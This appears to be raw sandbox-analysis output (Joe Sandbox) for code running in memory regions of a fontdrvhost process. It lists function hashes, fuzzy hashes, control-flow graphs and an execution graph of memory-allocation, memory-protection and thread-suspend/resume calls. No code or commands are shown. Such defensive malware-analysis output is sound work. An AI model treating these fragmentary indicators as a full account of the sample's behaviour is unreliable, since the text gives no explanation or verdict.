                                                                    • Opcode Fuzzy Hash: 38d2ae9b40e01ea4391cdf2590884496de028970a674d6282c467a8288703b6c
                                                                    • Instruction Fuzzy Hash: CCF02612A0CA478BF779DBA890750B83BB0EF15340F0406BAC05BD24D2EE18B8414381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA2670C Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4583c2ba19656c31cb865b77a5996a89d1086babf24e181f0a81c986aecedd26
                                                                    • Instruction ID: 048a137d278f508813a34666ff35c06884a5ca6be7264c14c9fed119c2e39415
                                                                    • Opcode Fuzzy Hash: 4583c2ba19656c31cb865b77a5996a89d1086babf24e181f0a81c986aecedd26
                                                                    • Instruction Fuzzy Hash: 65012930E0555E8FEB74EB18C8987E9B3B1EF94301F1082F5D41DA2299DA741E81CF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA206A5 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e7eb1e6881778821525c5971643fba51a4ef81b31ef8c71385bc34fdc07dee0b
                                                                    • Instruction ID: 49c8bd6ef03ed2565b99043494dcf68b92f85ee0e4bea34bfa13de3766edfe1a
                                                                    • Opcode Fuzzy Hash: e7eb1e6881778821525c5971643fba51a4ef81b31ef8c71385bc34fdc07dee0b
                                                                    • Instruction Fuzzy Hash: 12F05430E4560E9FEBA0EFA8D4596ED77E0FF54304F114437E81CC21A0DAB46690C784
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA206C8 Relevance: .0, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c24d933ba1f745f82d880346f083b029f9d907220e3d00da3aeb23e0e8f9906a
                                                                    • Instruction ID: 4f9c20cc620671a0530dfc2689d9986a4c51c6930a14fae134a8a1539bbfdc2c
                                                                    • Opcode Fuzzy Hash: c24d933ba1f745f82d880346f083b029f9d907220e3d00da3aeb23e0e8f9906a
                                                                    • Instruction Fuzzy Hash: 42F0123091564D9FDB90EFA4C4496EE7BE0FF14304F014466E81DD2160DA74A6A0CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA20B18 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2316496969008f09d09659316c41d102bc1514a271f663463e6ca2992d79f741
                                                                    • Instruction ID: 624e35642214ee15d999bd8f63e82883b7e966dd486ddec683d6d8aad9ca39c9
                                                                    • Opcode Fuzzy Hash: 2316496969008f09d09659316c41d102bc1514a271f663463e6ca2992d79f741
                                                                    • Instruction Fuzzy Hash: 9BF01530508A0ECFDF90EF68C944AAA37A1FF28301F000165F41DC31A4DB70EAA0CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C107635 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d766cce74b21b06da0dc4e7595b5aea7c76baea1a70b2ed1350f2d727a90a501
                                                                    • Instruction ID: 6938539bc20f30bf55ea480e924cd0a2bc2089614e45232d943650fe06b75454
                                                                    • Opcode Fuzzy Hash: d766cce74b21b06da0dc4e7595b5aea7c76baea1a70b2ed1350f2d727a90a501
                                                                    • Instruction Fuzzy Hash: 87E09A3281D38A8BE761DB5488760EC7B30BF00340F5801EAD90A16282DA6466189282
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C109E07 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1652889e5684e795787387994b6d85b161bcc6c744b848f2ef70e8d86f41ed73
                                                                    • Instruction ID: 32ee338efd8156dc670772b20a5067087a261245e430bbda5d8e9bc5cbf43b2c
                                                                    • Opcode Fuzzy Hash: 1652889e5684e795787387994b6d85b161bcc6c744b848f2ef70e8d86f41ed73
                                                                    • Instruction Fuzzy Hash: 30E0C202B0C6838FF73286B40CB50782FA09F0B3C0B1409F5D18A9A2D3D9183C049319
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10A8DB Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                                    • Instruction ID: 9b94548bcea625e1088c9e69c66b4fd2dae1edc2df189d4bac9fec5d32b0723c
                                                                    • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                                    • Instruction Fuzzy Hash: 48D0C912F0C603C5F138D6C1417123E21B9AF00382E20007FD25F719C1CD1C7A93A20D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:8.2%
                                                                    Dynamic/Decrypted Code Coverage:88.9%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:18
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 47630 7ffd9bbb1f85 47631 7ffd9bbb1f9f GetFileAttributesW 47630->47631 47633 7ffd9bbb2065 47631->47633 47638 7ffd9bbb02f9 47639 7ffd9bbb0307 FindCloseChangeNotification 47638->47639 47641 7ffd9bbb03e4 47639->47641 47634 7ffd9bbb0190 47635 7ffd9bbb019a ResumeThread 47634->47635 47637 7ffd9bbb02a4 47635->47637 47642 7ffd9bbaeaad 47643 7ffd9bbaeabb SuspendThread 47642->47643 47645 7ffd9bbaeb94 47643->47645 47626 7ffd9ba0201e 47627 7ffd9ba0202d VirtualProtect 47626->47627 47629 7ffd9ba0216d 47627->47629 47622 7ffd9ba03a0d 47623 7ffd9ba03a2f VirtualAlloc 47622->47623 47625 7ffd9ba03b45 47623->47625

                                                                    Executed Functions

                                                                    Function 00007FFD9BA0B7ED Relevance: 2.5, Strings: 1, Instructions: 1252COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 35 7ffd9ba0b7ed-7ffd9ba0b828 36 7ffd9ba0b82f-7ffd9ba0b88f 35->36 37 7ffd9ba0b82a 35->37 41 7ffd9ba0b89d-7ffd9ba0b8ac 36->41 42 7ffd9ba0b891 36->42 37->36 43 7ffd9ba0b8ae 41->43 44 7ffd9ba0b8b3-7ffd9ba0b8bc 41->44 42->41 43->44 45 7ffd9ba0b8be-7ffd9ba0b8cd 44->45 46 7ffd9ba0b8e9-7ffd9ba0b944 44->46 47 7ffd9ba0b8cf 45->47 48 7ffd9ba0b8d4-7ffd9ba0d255 call 7ffd9ba0e476 45->48 56 7ffd9ba0b946 46->56 57 7ffd9ba0b94b-7ffd9ba0bbe4 46->57 47->48 54 7ffd9ba0d260-7ffd9ba0d333 48->54 56->57 90 7ffd9ba0c8ce-7ffd9ba0c8db 57->90 91 7ffd9ba0c8e1-7ffd9ba0c8fe 90->91 92 7ffd9ba0bbe9-7ffd9ba0bbf7 90->92 97 7ffd9ba0c906-7ffd9ba0c923 91->97 93 7ffd9ba0bbfe-7ffd9ba0bd52 92->93 94 7ffd9ba0bbf9 92->94 140 7ffd9ba0bd9f-7ffd9ba0be52 93->140 141 7ffd9ba0bd54-7ffd9ba0bd99 93->141 94->93 100 7ffd9ba0c9e0-7ffd9ba0c9e6 97->100 103 7ffd9ba0c928-7ffd9ba0c985 100->103 104 7ffd9ba0c9ec-7ffd9ba0ca2e 100->104 115 7ffd9ba0c9b2-7ffd9ba0c9dd 103->115 116 7ffd9ba0c987-7ffd9ba0c98b 103->116 114 7ffd9ba0cc7c-7ffd9ba0cc82 104->114 119 7ffd9ba0ca33-7ffd9ba0cb7b 114->119 120 7ffd9ba0cc88-7ffd9ba0cce1 114->120 115->100 116->115 118 7ffd9ba0c98d-7ffd9ba0c9af 116->118 118->115 171 7ffd9ba0cc0d-7ffd9ba0cc11 119->171 172 7ffd9ba0cb81-7ffd9ba0cc0b 119->172 127 7ffd9ba0cd70-7ffd9ba0cdc7 120->127 128 7ffd9ba0cce7-7ffd9ba0cd33 120->128 152 7ffd9ba0d227-7ffd9ba0d22d 127->152 128->127 173 7ffd9ba0be61-7ffd9ba0bf0f 140->173 174 7ffd9ba0be54-7ffd9ba0be5c 140->174 141->140 153 7ffd9ba0d233-7ffd9ba0d25f call 7ffd9ba0e476 152->153 154 7ffd9ba0cdcc-7ffd9ba0ce6a 152->154 153->54 184 7ffd9ba0ce9a-7ffd9ba0cea9 154->184 185 7ffd9ba0ce6c-7ffd9ba0ce8f 154->185 175 7ffd9ba0cc13-7ffd9ba0cc45 171->175 176 7ffd9ba0cc47-7ffd9ba0cc5a 171->176 187 7ffd9ba0cc5b-7ffd9ba0cc79 172->187 211 7ffd9ba0bf1e-7ffd9ba0bfcc 173->211 212 7ffd9ba0bf11-7ffd9ba0bf19 173->212 177 7ffd9ba0c8b9-7ffd9ba0c8cb 174->177 175->187 176->187 177->90 189 7ffd9ba0ceb0-7ffd9ba0cebf 184->189 190 7ffd9ba0ceab 184->190 185->184 187->114 191 7ffd9ba0cec1-7ffd9ba0cecf 189->191 192 7ffd9ba0ced4-7ffd9ba0ceef 189->192 190->189 195 7ffd9ba0d206-7ffd9ba0d224 191->195 196 7ffd9ba0cf0f-7ffd9ba0d1fb 192->196 197 7ffd9ba0cef1-7ffd9ba0cf0b 192->197 195->152 196->195 197->196 220 7ffd9ba0bfce-7ffd9ba0bfd6 211->220 221 7ffd9ba0bfdb-7ffd9ba0c089 211->221 212->177 220->177 229 7ffd9ba0c098-7ffd9ba0c0a3 221->229 230 7ffd9ba0c08b-7ffd9ba0c093 221->230 229->177 230->177
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba0b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: jX_H
                                                                    • API String ID: 0-1381252938
                                                                    • Opcode ID: cb747480b85ae157accdaf6b2a08e28e9f9633afc4e1cdd1d273ad6aef43858b
                                                                    • Instruction ID: 56711f0a79feec0a03c67ff154c71b9b05519fb1e1f23ca94bad0ec260dae0e9
                                                                    • Opcode Fuzzy Hash: cb747480b85ae157accdaf6b2a08e28e9f9633afc4e1cdd1d273ad6aef43858b
                                                                    • Instruction Fuzzy Hash: 53B20C70E0991D8FDBA8EF58C8A5AA8B7B1FB59300F5441EAD04DE3291DE756E81CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DB66F Relevance: .7, Instructions: 726COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 385bda896fc5a1bd923a44321d3e1f683e117acde8375b6c06e61d3f5f34d13c
                                                                    • Instruction ID: eb6620716ca2fcde172ebd815047282bb5057d2e20a4a40612b76ae1c0f7b26b
                                                                    • Opcode Fuzzy Hash: 385bda896fc5a1bd923a44321d3e1f683e117acde8375b6c06e61d3f5f34d13c
                                                                    • Instruction Fuzzy Hash: 58529130A1865A8FEB68DF58C4A56B877B1FF55300F5042BDE45ECB2C6DB38A981CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCCC68 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $X1_H
                                                                    • API String ID: 0-3961195906
                                                                    • Opcode ID: ea364f6295760fb2ecd1688b3652a1ae8c5d54f268a9d53bf4838dda1ed6c44a
                                                                    • Instruction ID: 2235b8f45b81bdc67e765d16357a9108c45824f8513ecd2a11bfaa1b97a57a64
                                                                    • Opcode Fuzzy Hash: ea364f6295760fb2ecd1688b3652a1ae8c5d54f268a9d53bf4838dda1ed6c44a
                                                                    • Instruction Fuzzy Hash: 7E517C71E0950E8FDB59EB98C4A55FDBBB1FF55304F1140BAC01AE72D6DA386941CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DD170 Relevance: 2.3, Strings: 1, Instructions: 1053COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: r^^
                                                                    • API String ID: 0-2110808769
                                                                    • Opcode ID: 5ca395970e8d484b59e319911eb5ac938ceac7bb9f473067d2194e9d3bfecb98
                                                                    • Instruction ID: 5146a7b34c57ee64f636f157aebe234896cc24f96d4dfde7d3c62bbdfb0f9a7b
                                                                    • Opcode Fuzzy Hash: 5ca395970e8d484b59e319911eb5ac938ceac7bb9f473067d2194e9d3bfecb98
                                                                    • Instruction Fuzzy Hash: C972EA12F0D3634BF722BBACA4F59E67BE09F12268F0902F7E05D490D3EE09694592D5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA0C0A8 Relevance: 2.0, Strings: 1, Instructions: 718COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 506 7ffd9ba0c0a8-7ffd9ba0c146 513 7ffd9ba0c155-7ffd9ba0c203 506->513 514 7ffd9ba0c148-7ffd9ba0c150 506->514 541 7ffd9ba0c212-7ffd9ba0c2c0 513->541 542 7ffd9ba0c205-7ffd9ba0c20d 513->542 515 7ffd9ba0c8b9-7ffd9ba0c8db 514->515 519 7ffd9ba0c8e1-7ffd9ba0c8fe 515->519 520 7ffd9ba0bbe9-7ffd9ba0bbf7 515->520 526 7ffd9ba0c906-7ffd9ba0c923 519->526 521 7ffd9ba0bbfe-7ffd9ba0bd52 520->521 522 7ffd9ba0bbf9 520->522 585 7ffd9ba0bd9f-7ffd9ba0be52 521->585 586 7ffd9ba0bd54-7ffd9ba0bd99 521->586 522->521 531 7ffd9ba0c9e0-7ffd9ba0c9e6 526->531 535 7ffd9ba0c928-7ffd9ba0c985 531->535 536 7ffd9ba0c9ec-7ffd9ba0ca2e 531->536 552 7ffd9ba0c9b2-7ffd9ba0c9dd 535->552 553 7ffd9ba0c987-7ffd9ba0c98b 535->553 551 7ffd9ba0cc7c-7ffd9ba0cc82 536->551 577 7ffd9ba0c2cf-7ffd9ba0c37d 541->577 578 7ffd9ba0c2c2-7ffd9ba0c2ca 541->578 542->515 557 7ffd9ba0ca33-7ffd9ba0cb7b 551->557 558 7ffd9ba0cc88-7ffd9ba0cce1 551->558 552->531 553->552 556 7ffd9ba0c98d-7ffd9ba0c9af 553->556 556->552 624 7ffd9ba0cc0d-7ffd9ba0cc11 557->624 625 7ffd9ba0cb81-7ffd9ba0cc0b 557->625 567 7ffd9ba0cd70-7ffd9ba0cdc7 558->567 568 7ffd9ba0cce7-7ffd9ba0cd33 558->568 599 7ffd9ba0d227-7ffd9ba0d22d 567->599 568->567 621 7ffd9ba0c37f-7ffd9ba0c387 577->621 622 7ffd9ba0c38c-7ffd9ba0c43a 577->622 578->515 627 7ffd9ba0be61-7ffd9ba0bf0f 585->627 628 7ffd9ba0be54-7ffd9ba0be5c 585->628 586->585 600 7ffd9ba0d233-7ffd9ba0d333 call 7ffd9ba0e476 599->600 601 7ffd9ba0cdcc-7ffd9ba0ce6a 599->601 640 7ffd9ba0ce9a-7ffd9ba0cea9 601->640 641 7ffd9ba0ce6c-7ffd9ba0ce8f 601->641 621->515 678 7ffd9ba0c449-7ffd9ba0c4f7 622->678 679 7ffd9ba0c43c-7ffd9ba0c444 622->679 630 7ffd9ba0cc13-7ffd9ba0cc45 624->630 631 7ffd9ba0cc47-7ffd9ba0cc5a 624->631 645 7ffd9ba0cc5b-7ffd9ba0cc79 625->645 681 7ffd9ba0bf1e-7ffd9ba0bfcc 627->681 682 7ffd9ba0bf11-7ffd9ba0bf19 627->682 628->515 630->645 631->645 647 7ffd9ba0ceb0-7ffd9ba0cebf 640->647 648 7ffd9ba0ceab 640->648 641->640 645->551 649 7ffd9ba0cec1-7ffd9ba0cecf 647->649 650 7ffd9ba0ced4-7ffd9ba0ceef 647->650 648->647 655 7ffd9ba0d206-7ffd9ba0d224 649->655 656 7ffd9ba0cf0f-7ffd9ba0d1fb 650->656 657 7ffd9ba0cef1-7ffd9ba0cf0b 650->657 655->599 656->655 657->656 696 7ffd9ba0c506-7ffd9ba0c511 678->696 697 7ffd9ba0c4f9-7ffd9ba0c501 678->697 679->515 698 7ffd9ba0bfce-7ffd9ba0bfd6 681->698 699 7ffd9ba0bfdb-7ffd9ba0c089 681->699 682->515 702 7ffd9ba0c572-7ffd9ba0c5b4 696->702 703 7ffd9ba0c513-7ffd9ba0c570 696->703 697->515 698->515 722 7ffd9ba0c098-7ffd9ba0c0a3 699->722 723 7ffd9ba0c08b-7ffd9ba0c093 699->723 712 7ffd9ba0c5c3-7ffd9ba0c671 702->712 713 7ffd9ba0c5b6-7ffd9ba0c5be 702->713 703->702 728 7ffd9ba0c680-7ffd9ba0c72e 712->728 729 7ffd9ba0c673-7ffd9ba0c67b 712->729 713->515 722->515 723->515 737 7ffd9ba0c73d-7ffd9ba0c7eb 728->737 738 7ffd9ba0c730-7ffd9ba0c738 728->738 729->515 746 7ffd9ba0c7ed-7ffd9ba0c7f5 737->746 747 7ffd9ba0c7fa-7ffd9ba0c8a8 737->747 738->515 746->515 755 7ffd9ba0c8b4-7ffd9ba0c8b6 747->755 756 7ffd9ba0c8aa-7ffd9ba0c8b2 747->756 755->515 756->515
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba0b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^X_H
                                                                    • API String ID: 0-756895932
                                                                    • Opcode ID: dbccc6222959e452bf791cb09b9081e1b2a27bccda7d53de94ceb20612059ef7
                                                                    • Instruction ID: ab01cce0ca866e6842159afe4b68e8859d56c8a198d9d5ba15f65897eaefdbe3
                                                                    • Opcode Fuzzy Hash: dbccc6222959e452bf791cb09b9081e1b2a27bccda7d53de94ceb20612059ef7
                                                                    • Instruction Fuzzy Hash: A9521071E0992D8FEBA4EF58C8A97A8B7B1FB59300F4401FAD04DD3191DA786E858F41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D861D Relevance: 1.7, Strings: 1, Instructions: 404COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^8
                                                                    • API String ID: 0-1095223944
                                                                    • Opcode ID: 2fe8ad2c0737e2c0a5ae8fa5adcf8d68c3ed2595147cb61c749edca4351ddd3a
                                                                    • Instruction ID: a04c5be144b5be0e86b6ccd28b4f9d4ed30a83851f8fcde782446aa6450d960c
                                                                    • Opcode Fuzzy Hash: 2fe8ad2c0737e2c0a5ae8fa5adcf8d68c3ed2595147cb61c749edca4351ddd3a
                                                                    • Instruction Fuzzy Hash: 3F510C31B0C61B8FE775BBA894625F877F0EF04390F1903B6E44D860D6EF29684596C1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCCEDF Relevance: 1.6, Strings: 1, Instructions: 361COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 865 7ffd9bbccedf-7ffd9bbccef2 866 7ffd9bbccef4-7ffd9bbcd235 865->866 867 7ffd9bbccf3e-7ffd9bbccf54 865->867 873 7ffd9bbcd23f-7ffd9bbcd27e 866->873 869 7ffd9bbccf5a-7ffd9bbccf62 867->869 870 7ffd9bbccfe4-7ffd9bbcd014 867->870 872 7ffd9bbccf68-7ffd9bbccf7a 869->872 869->873 880 7ffd9bbcd01a-7ffd9bbcd01b 870->880 881 7ffd9bbcd0be-7ffd9bbcd0c7 870->881 872->873 874 7ffd9bbccf80-7ffd9bbccf97 872->874 884 7ffd9bbcd280 873->884 877 7ffd9bbccf99-7ffd9bbccfa0 874->877 878 7ffd9bbccfd7-7ffd9bbccfde 874->878 877->873 879 7ffd9bbccfa6-7ffd9bbccfd4 877->879 878->869 878->870 879->878 883 7ffd9bbcd01e-7ffd9bbcd034 880->883 885 7ffd9bbcd0cd-7ffd9bbcd0d3 881->885 886 7ffd9bbcd1ff-7ffd9bbcd20d 881->886 883->873 890 7ffd9bbcd03a-7ffd9bbcd05e 883->890 893 7ffd9bbcd28b-7ffd9bbcd321 884->893 885->873 887 7ffd9bbcd0d9-7ffd9bbcd0e8 885->887 888 7ffd9bbcd214-7ffd9bbcd225 886->888 889 7ffd9bbcd20f 886->889 891 7ffd9bbcd1f2-7ffd9bbcd1f9 887->891 892 7ffd9bbcd0ee-7ffd9bbcd0f5 887->892 889->888 894 7ffd9bbcd0b1-7ffd9bbcd0b8 890->894 895 7ffd9bbcd060-7ffd9bbcd083 call 7ffd9bbc9200 890->895 891->885 891->886 892->873 896 7ffd9bbcd0fb-7ffd9bbcd107 call 7ffd9bbc9200 892->896 903 7ffd9bbcd32c-7ffd9bbcd32d 893->903 904 7ffd9bbcd2a6-7ffd9bbcd326 893->904 894->881 894->883 895->873 905 7ffd9bbcd089-7ffd9bbcd0af 895->905 902 7ffd9bbcd10c-7ffd9bbcd117 896->902 906 7ffd9bbcd119-7ffd9bbcd130 902->906 907 7ffd9bbcd156-7ffd9bbcd165 902->907 913 7ffd9bbcd2ee-7ffd9bbcd301 903->913 914 7ffd9bbcd32f-7ffd9bbcd36f 903->914 904->903 916 7ffd9bbcd2c8-7ffd9bbcd328 904->916 905->894 905->895 906->873 911 7ffd9bbcd136-7ffd9bbcd152 906->911 907->873 912 7ffd9bbcd16b-7ffd9bbcd18f 907->912 911->906 915 7ffd9bbcd154 911->915 917 7ffd9bbcd192-7ffd9bbcd1af 912->917 922 7ffd9bbcd32a 913->922 925 7ffd9bbcd371-7ffd9bbcd3c6 914->925 919 7ffd9bbcd1d2-7ffd9bbcd1e8 915->919 916->922 924 7ffd9bbcd2df-7ffd9bbcd2ea 916->924 917->873 921 7ffd9bbcd1b5-7ffd9bbcd1d0 917->921 919->873 926 7ffd9bbcd1ea-7ffd9bbcd1ee 919->926 921->917 921->919 923 7ffd9bbcd303-7ffd9bbcd30b 922->923 923->903 929 7ffd9bbcd30d-7ffd9bbcd320 923->929 924->903 928 7ffd9bbcd2ec-7ffd9bbcd301 924->928 933 7ffd9bbcd3d1-7ffd9bbcd477 925->933 926->891 928->922 928->923 945 7ffd9bbcd5a7-7ffd9bbcd5c4 933->945 946 7ffd9bbcd47d-7ffd9bbcd820 933->946 948 7ffd9bbcd5ca-7ffd9bbcd5cf 945->948 949 7ffd9bbcd8d1-7ffd9bbcdaa8 945->949 954 7ffd9bbcd88e-7ffd9bbcd8a8 946->954 950 7ffd9bbcd5d2-7ffd9bbcd5d9 948->950 952 7ffd9bbcd5db-7ffd9bbcd5df 950->952 953 7ffd9bbcd55c-7ffd9bbcd8c9 950->953 952->925 957 7ffd9bbcd5e5 952->957 953->949 959 7ffd9bbcd663-7ffd9bbcd666 957->959 960 7ffd9bbcd669-7ffd9bbcd670 959->960 961 7ffd9bbcd676 960->961 962 7ffd9bbcd5e7-7ffd9bbcd61c call 7ffd9bbcd270 960->962 963 7ffd9bbcd6e6-7ffd9bbcd6ed 961->963 962->949 970 7ffd9bbcd622-7ffd9bbcd632 962->970 965 7ffd9bbcd678-7ffd9bbcd6aa call 7ffd9bbcd270 963->965 966 7ffd9bbcd6ef-7ffd9bbcd735 963->966 965->949 973 7ffd9bbcd6b0-7ffd9bbcd6d8 965->973 981 7ffd9bbcd73b-7ffd9bbcd740 966->981 982 7ffd9bbcd504-7ffd9bbcd508 966->982 970->925 972 7ffd9bbcd638-7ffd9bbcd655 970->972 972->949 975 7ffd9bbcd65b-7ffd9bbcd660 972->975 973->949 976 7ffd9bbcd6de-7ffd9bbcd6e3 973->976 975->959 976->963 985 7ffd9bbcd7c6-7ffd9bbcd7ca 981->985 983 7ffd9bbcd55a 982->983 984 7ffd9bbcd50a-7ffd9bbcd527 982->984 983->950 984->954 986 7ffd9bbcd745-7ffd9bbcd774 call 7ffd9bbcd270 985->986 987 7ffd9bbcd7d0-7ffd9bbcd7d6 985->987 986->949 990 7ffd9bbcd77a-7ffd9bbcd78a 986->990 990->933 991 7ffd9bbcd790-7ffd9bbcd79f 990->991 991->949 992 7ffd9bbcd7a5-7ffd9bbcd7b8 991->992 992->960 993 7ffd9bbcd7be-7ffd9bbcd7c3 992->993 993->985
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: k@
                                                                    • API String ID: 0-350512992
                                                                    • Opcode ID: f579f6c6d0dd53790c3022d843e050274251bae2224785f2adda810b7600d180
